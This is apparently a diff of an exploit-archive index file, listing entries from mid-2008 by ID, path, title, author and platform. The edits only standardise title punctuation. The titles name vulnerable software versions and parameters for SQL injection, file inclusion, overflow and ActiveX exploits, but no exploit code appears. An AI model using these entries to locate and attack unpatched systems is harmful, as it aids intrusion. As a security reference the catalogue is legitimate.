Exploit",2008-06-01,His0k4,php,webapps,0 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion Vulnerabilities",2008-06-01,MK,php,webapps,0 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL/upload/XSS) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection",2008-06-01,KnocKout,asp,webapps,0 -5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0 +5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x - BlindSQL Injection Exploit",2008-06-02,His0k4,php,webapps,0 @@ -5352,9 +5352,9 @@ id,file,description,date,author,platform,type,port 5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - (SQL/XSS) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 5727,platforms/windows/dos/5727.pl,"MDaemon <= 9.6.5 - Multiple Remote Buffer Overflow Exploit PoC",2008-06-02,securfrog,windows,dos,0 5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b Remote Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0 -5729,platforms/php/webapps/5729.txt,"Joomla Component joomradio 1.0 (id) SQL Injection",2008-06-03,His0k4,php,webapps,0 +5729,platforms/php/webapps/5729.txt,"Joomla Component joomradio 1.0 - (id) SQL Injection",2008-06-03,His0k4,php,webapps,0 5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog <= b24 - Remote SQL Injection",2008-06-03,His0k4,php,webapps,0 -5731,platforms/php/webapps/5731.txt,"Battle Blog <= 1.25 (comment.asp) Remote SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 +5731,platforms/php/webapps/5731.txt,"Battle Blog <= 1.25 - (comment.asp) Remote SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX Remote Download & Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 5733,platforms/php/webapps/5733.txt,"quickersite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection Exploit",2008-06-03,His0k4,php,webapps,0 @@ -5362,11 +5362,11 @@ id,file,description,date,author,platform,type,port 5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader <= 1.2.1.a - BlindSQL Injection Exploit",2008-06-04,His0k4,php,webapps,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks NSI Double Take Remote Overflow Exploit (Metasploit)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book <= 3.1.5 - (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 -5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit",2008-06-04,ZAMUT,php,webapps,0 +5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 - (gbid) SQL Injection Exploit",2008-06-04,ZAMUT,php,webapps,0 5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - (SQL/XSS) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 5743,platforms/php/webapps/5743.txt,"Joomla Component simpleshop <= 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 -5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0 +5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0 5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a (shownews) Remote SQL Injection",2008-06-05,anonymous,php,webapps,0 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote BoF Exploit",2008-06-05,shinnai,windows,remote,0 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote BoF Exploit (2)",2008-06-05,shinnai,windows,remote,0 @@ -5379,7 +5379,7 @@ id,file,description,date,author,platform,type,port 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment <= 1.16 - Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - (filename) File Disclosure",2008-06-08,MEEKAAH,php,webapps,0 -5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 (clients.php) Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0 +5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0 5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - XSS / Local File Inclusion",2008-06-08,StAkeR,php,webapps,0 5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL Injection",2008-06-08,His0k4,php,webapps,0 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0 @@ -5387,16 +5387,16 @@ id,file,description,date,author,platform,type,port 5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion",2008-06-09,Stack,php,webapps,0 5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - (SQL/XSS) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0 5764,platforms/php/webapps/5764.txt,"telephone directory 2008 - (SQL/XSS) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 -5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 (article) Remote SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 +5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - (article) Remote SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 5766,platforms/php/webapps/5766.txt,"realm CMS <= 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 -5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0 -5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 +5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 - (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0 +5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) Remote SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0 -5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection",2008-06-10,Unohope,php,webapps,0 +5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) Remote SQL Injection",2008-06-10,Unohope,php,webapps,0 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (XSS/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 -5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities",2008-06-10,Unohope,php,webapps,0 +5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) Remote SQL Injection Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - Remote SQL Injection",2008-06-10,JosS,php,webapps,0 5776,platforms/php/webapps/5776.txt,"Experts (answer.php) 1.0.0 - Remote SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) Remote BoF Exploit",2008-06-10,shinnai,windows,remote,0 @@ -5407,7 +5407,7 @@ id,file,description,date,author,platform,type,port 5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar (board) Remote SQL Injection Exploit",2008-06-10,RMx,php,webapps,0 5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion Vulnerabilities",2008-06-11,"CWH Underground",php,webapps,0 -5785,platforms/php/webapps/5785.txt,"eFiction 3.0 (toplists.php list) Remote SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 +5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) Remote SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add-Admin Exploit",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Remote Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injection Vulnerabilities",2008-06-11,BugReport.IR,php,webapps,0 @@ -5415,75 +5415,75 @@ id,file,description,date,author,platform,type,port 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 beta - (SQL/XSS) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC Multiple Local File Inclusion Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 -5793,platforms/windows/remote/5793.html,"muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BoF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 -5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 (results.php) Remote SQL Injection Exploit",2008-06-12,anonymous,php,webapps,0 +5793,platforms/windows/remote/5793.html,"muvee autoProducer <= 6.1 - (TextOut.dll) ActiveX Remote BoF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 +5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - (results.php) Remote SQL Injection Exploit",2008-06-12,anonymous,php,webapps,0 5795,platforms/windows/remote/5795.html,"XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Exploit",2008-06-12,TheDefaced,php,webapps,0 5797,platforms/php/webapps/5797.txt,"butterfly organizer 2.0.0 - (SQL/XSS) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 -5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 (aid) Remote SQL Injection Exploit",2008-06-13,Houssamix,php,webapps,0 +5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 - (aid) Remote SQL Injection Exploit",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly Organizer 2.0.0 - Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 -5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 -5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 (tsk_id) Remote SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 -5803,platforms/php/webapps/5803.txt,"Pre News Manager <= 1.0 (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 +5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 +5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) Remote SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 +5803,platforms/php/webapps/5803.txt,"Pre News Manager <= 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 5804,platforms/php/webapps/5804.txt,"Pre Ads Portal <= 2.0 - Remote SQL Injection",2008-06-13,K-159,php,webapps,0 5805,platforms/asp/webapps/5805.txt,"E-SMART CART (productsofcat.asp) Remote SQL Injection",2008-06-13,JosS,asp,webapps,0 -5806,platforms/php/webapps/5806.pl,"GLLCTS2 (listing.php sort) Remote Blind SQL Injection Exploit",2008-06-13,anonymous,php,webapps,0 +5806,platforms/php/webapps/5806.pl,"GLLCTS2 - (listing.php sort) Remote Blind SQL Injection Exploit",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo <= 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board (JobSearch.php) Remote SQL Injection",2008-06-14,JosS,php,webapps,0 5810,platforms/php/webapps/5810.txt,"contenido 4.8.4 - (RFI/XSS) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple Remote SQL Injection Vulnerabilities",2008-06-14,"CWH Underground",php,webapps,0 5812,platforms/php/webapps/5812.txt,"PHPMyCart (shop.php cat) Remote SQL Injection",2008-06-14,anonymous,php,webapps,0 -5813,platforms/php/webapps/5813.txt,"Shoutcast Admin Panel 2.0 (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 -5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 (CWD) Remote Memory Consumption Exploit (post auth)",2008-06-14,"Praveen Darshanam",linux,dos,0 -5815,platforms/php/webapps/5815.pl,"Cartweaver 3 (prodId) Remote Blind SQL Injection Exploit",2008-06-14,anonymous,php,webapps,0 +5813,platforms/php/webapps/5813.txt,"Shoutcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 +5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Remote Memory Consumption Exploit (post auth)",2008-06-14,"Praveen Darshanam",linux,dos,0 +5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Remote Blind SQL Injection Exploit",2008-06-14,anonymous,php,webapps,0 5816,platforms/php/webapps/5816.pl,"DIY (index_topic did) Blind SQL Injection Exploit",2008-06-14,Mr.SQL,php,webapps,0 5817,platforms/windows/dos/5817.pl,"Dana IRC <= 1.3 - Remote Buffer Overflow PoC",2008-06-14,t0pP8uZz,windows,dos,0 5818,platforms/php/webapps/5818.txt,"xeCMS <= 1.0.0 RC2 Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 5819,platforms/php/webapps/5819.txt,"ezcms <= 1.2 - (bSQL/admin byapss) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 -5820,platforms/php/webapps/5820.txt,"PHPEasyNews <= 1.13 RC2 (post) Remote SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 +5820,platforms/php/webapps/5820.txt,"PHPEasyNews <= 1.13 RC2 - (post) Remote SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 5821,platforms/php/webapps/5821.txt,"AlstraSoft AskMe Pro <= 2.1 - Multiple SQL Injection Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 -5823,platforms/php/webapps/5823.txt,"AWBS <= 2.7.1 (news.php viewnews) Remote SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 -5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 +5823,platforms/php/webapps/5823.txt,"AWBS <= 2.7.1 - (news.php viewnews) Remote SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 +5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 5826,platforms/php/webapps/5826.py,"Simple Machines Forum <= 1.1.4 - Remote SQL Injection Exploit",2008-06-15,The:Paradox,php,webapps,0 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow Exploit",2008-06-15,Heretic2,windows,remote,4000 -5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 (repquote) Remote SQL Injection",2008-06-15,anonymous,php,webapps,0 +5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) Remote SQL Injection",2008-06-15,anonymous,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 -5830,platforms/php/webapps/5830.txt,"NiTrO Web Gallery <= 1.4.3 (section) Remote SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 -5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS <= 0.22 (lang) Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 +5830,platforms/php/webapps/5830.txt,"NiTrO Web Gallery <= 1.4.3 - (section) Remote SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 +5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS <= 0.22 - (lang) Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - BlindSQL Injection Exploit",2008-06-16,anonymous,php,webapps,0 5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x - (catid) SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection Exploit",2008-06-17,Mr.SQL,php,webapps,0 -5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 (index.php Id) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - (index.php Id) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5836,platforms/php/webapps/5836.txt,"BaSiC-CMS - (index.php r) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - dne2000.sys kernel ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 -5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 (index.php page) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 (tid) Remote SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 +5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - (index.php page) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - (tid) Remote SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) Remote SQL Injection",2008-06-17,anonymous,php,webapps,0 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 -5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - (index.php page) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0 5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 -5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 +5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 - (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - (includedir) Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 5849,platforms/asp/webapps/5849.txt,"doITlive CMS <= 2.50 - (SQL Injection/XSS) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Remote File Upload",2008-06-18,Alemin_Krali,php,webapps,0 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow PoC",2008-06-18,shinnai,windows,dos,0 5852,platforms/php/webapps/5852.txt,"netBIOS (showNews.php newsid) SQL Injection",2008-06-18,"security fears team",php,webapps,0 -5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 (categori) Remote SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 +5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) Remote SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds (index.php cat) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 -5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 (index.php postid) Remote SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 +5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 - (index.php postid) Remote SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 5856,platforms/php/webapps/5856.txt,"nweb2fax <= 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,php,webapps,0 5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds (index.php cat) Remote SQL Injection",2008-06-18,Stack,php,webapps,0 5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds (index.php type) SQL Injection",2008-06-18,Stack,php,webapps,0 5859,platforms/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) <= 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 5860,platforms/php/webapps/5860.txt,"ownrs blog beta3 - (SQL/XSS) Multiple Vulnerabilities",2008-06-19,"CWH Underground",php,webapps,0 5861,platforms/php/webapps/5861.txt,"Academic Web Tools CMS <= 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 -5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 (contentsid) Remote SQL Injection",2008-06-19,dun,php,webapps,0 +5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - (contentsid) Remote SQL Injection",2008-06-19,dun,php,webapps,0 5863,platforms/php/webapps/5863.txt,"CMS-BRD (menuclick) Remote SQL Injection",2008-06-19,dun,php,webapps,0 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) Remote SQL Injection",2008-06-19,anonymous,php,webapps,0 @@ -5492,103 +5492,103 @@ id,file,description,date,author,platform,type,port 5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) Remote SQL Injection",2008-06-19,"Hussin X",php,webapps,0 5869,platforms/php/webapps/5869.txt,"virtual support office-xp <= 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum <= 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 -5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 (index.php page) Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 -5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 (index.php page) Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 +5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - (index.php page) Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 +5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - (index.php page) Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5873,platforms/php/webapps/5873.txt,"lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 -5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0 -5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 (links-extern.php id) Remote SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 +5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0 +5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) Remote SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion Vulnerabilities",2008-06-20,cyberlog,php,webapps,0 5877,platforms/php/webapps/5877.txt,"jaxultrabb <= 2.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 -5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 (cat_id) Remote SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 +5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - (cat_id) Remote SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 5879,platforms/php/webapps/5879.txt,"PHPAuction (profile.php user_id) Remote SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5880,platforms/php/webapps/5880.txt,"sitexs CMS 0.1.1 - (upload/XSS) Multiple Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 -5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 (readarticle.php article_id) SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 -5882,platforms/php/webapps/5882.txt,"eNews 0.1 (delete.php) Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 -5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 (cat_id) SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 +5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - (readarticle.php article_id) SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 +5882,platforms/php/webapps/5882.txt,"eNews 0.1 - (delete.php) Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 +5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - (cat_id) SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase <= 0.41 - Blind SQL Injection Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS <= 1.5 - Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5887,platforms/php/webapps/5887.pl,"LE.CMS <= 1.4 - Remote Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5888,platforms/php/webapps/5888.txt,"CCLeague Pro <= 1.2 Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 -5889,platforms/php/webapps/5889.txt,"OFFL <= 0.2.6 (teams.php fflteam) Remote SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 +5889,platforms/php/webapps/5889.txt,"OFFL <= 0.2.6 - (teams.php fflteam) Remote SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME (news.php id) Remote SQL Injection",2008-06-21,"Hussin X",php,webapps,0 